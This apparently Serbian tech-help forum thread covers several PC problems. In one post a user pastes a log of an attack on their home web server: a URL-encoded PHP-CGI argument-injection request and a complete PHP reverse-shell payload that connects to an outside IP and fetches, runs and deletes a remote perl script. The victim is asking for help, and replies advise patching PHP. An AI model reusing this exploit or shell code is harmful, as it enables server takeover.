Moća Posted August 29, 2014 Share Posted August 29, 2014 Obrisao, cekirao disk preko cmd-a kaze da je sve u redu nema bad sectora tako da sam odahnuo sto se toga tice. Ali moram posle da odradim reinstal. Link to comment
katamaran Posted August 29, 2014 Share Posted August 29, 2014 (edited) Promena lozinke prvo. Onda odeš u podešavanja i pobrišeš sve alplikacije. Pitanje, da li ima ikonicu fejsbuka na desktu, da li ima one razne tulbarove, facebook instant mesindžer ili nesto takvo? Novi momenti. Brisanje neke aplikacije je sprecilo prokletinju da spamuje taj neki link ali nastavlja da je ubacuje u grupe i posle brisanja svih aplikacija A activity logu samo bude was added to random group by neki lik. Koliko ja vidim samo prijatelji mogu da te dodaju u grupe a ovi likovi joj nisu prijatelji. Totalno sam zbunjen. Moguce da ih nekako sprijatelji pa anfrenduje posle dodavanja u grupe. Al opet hebeno kako? Poslednjih 24h se nije ni logovala na fejs tako da to nije neophodan uslov da bi je ubacivali u grupe. Sve neke kretenske grupe sa Novog Zelanda. Uglavnom vezane za kola. Edited August 29, 2014 by katamaran Link to comment
maheem Posted August 30, 2014 Share Posted August 30, 2014 (edited) Youtube mi posle 15ak minuta gasi računar?!Ima li neko ideju šta može biti u pitanju?Pregrejavanje neko pretpostavljam?edit: desktop je u pitanju Edited August 30, 2014 by maheem Link to comment
renne Posted August 30, 2014 Share Posted August 30, 2014 pregrejavanje, očisti vent na procu Link to comment
mei Posted August 31, 2014 Share Posted August 31, 2014 napalo mi http server kod kuće sa ovim POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1 što se dekodira u ovo POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1 ovo su POST data, iz mog log-a: 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21'; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7'; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $pid = pcntl_fork(); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid == -1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't fork"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (posix_setsid() == -1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("Error: Can't setsid()"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 1; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("WARNING: Failed to daemonise."); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("$errstr ($errno)"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array( 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 0 => array("pipe", "r"), 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 1 => array("pipe", "w"), 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2 => array("pipe", "w") 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't spawn shell"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($sock)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell connection terminated"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($pipes[1])) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell process terminated"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $read_a = array($sock, $pipes[1], $pipes[2]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($sock, $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($sock, $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($pipes[0], $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[1], $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[1], $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[2], $read_a)) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR READ"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[2], $chunk_size); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR: $input"); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$daemon) { 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] print "$string 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] "; 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1); 2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?> kaj da radim sad, tj. šta da proveravam Link to comment
djili Posted August 31, 2014 Share Posted August 31, 2014 (edited) mozda je samo bot, pogledaj sta ovi kazu, i related pitanja. http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me Edited August 31, 2014 by djili Link to comment
katamaran Posted August 31, 2014 Share Posted August 31, 2014 (edited) Nastavljam istragu sekinog druzenja sa novozelandjanima Cela prica pocinje lajkovanjem nekog klipa na nekoj nasoj retardiranoj i nadasve seems legit stranici sa video klipovima. Ne bih da linkujem onu kretenariju od stranice... Tu je zet njenim nalogom lajkovao neki video da bi ga pogledao pa se navodno u pola posla setio da smo mu rekli da to ne radi pa je navodno odustao. uglavnom njoj se tada pojavljuje likes a kretenski video on kretenskisajt.com i posle toga krece ubacivanje u NZ grupe i spamovanje WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info Utepavanjem aplikacija sprecio sam spamovanje ali u grupe i dalje upada. Jedino sada smanjenim intenzitetom od oko dve dnevno. Obrisao sam joj sve aplikacije i igre i cak iskljucio platformu sa aplikacijama ali nista ne pomaze edit: kad sam guglao ono sto je spamovala pojavljuje se jos nasih ljudi koji to postuju tako da sam siguran da je ona stranica uzrok. Edited August 31, 2014 by katamaran Link to comment
ToniAdams Posted August 31, 2014 Share Posted August 31, 2014 skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb. sta sad da radim? Link to comment
wall Posted August 31, 2014 Share Posted August 31, 2014 skino nesto sa kioksa, i sad u tom folderu izmedju ostalog imam 5 iso fajlova od 200-500 mb. sta sad da radim? Narežeš na CD. Link to comment
maheem Posted August 31, 2014 Share Posted August 31, 2014 pregrejavanje, očisti vent na procu fala renne. učiniću to. danas radi ok al vreme mu je izgleda za penziju Link to comment
wall Posted August 31, 2014 Share Posted August 31, 2014 Narežeš na CD. Edit: A ako ti ne treba na cd-ovima možeš raspakovati na disku... Ne znam šta je... Link to comment
katamaran Posted August 31, 2014 Share Posted August 31, 2014 Narežeš na CD. so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima Link to comment
wall Posted August 31, 2014 Share Posted August 31, 2014 so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima :)Možda mu treba tako. Link to comment
Töölönlahti Posted August 31, 2014 Share Posted August 31, 2014 kaj da radim sad Ne mogu sad da čitam kôd s moba, ali svakako updateuj PHP i nemoj da držiš više interpreter u /cgi/bin/. Link to comment
ToniAdams Posted August 31, 2014 Share Posted August 31, 2014 so 19th century :) instaliras virtualni drajv pa ga samo mountujes. Ucitas iso fajl i komp se ponasa kao da si ubacio disk sa tim podacima a cekaj, ubacim svih 5 ili je svaki zasebno? Link to comment
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now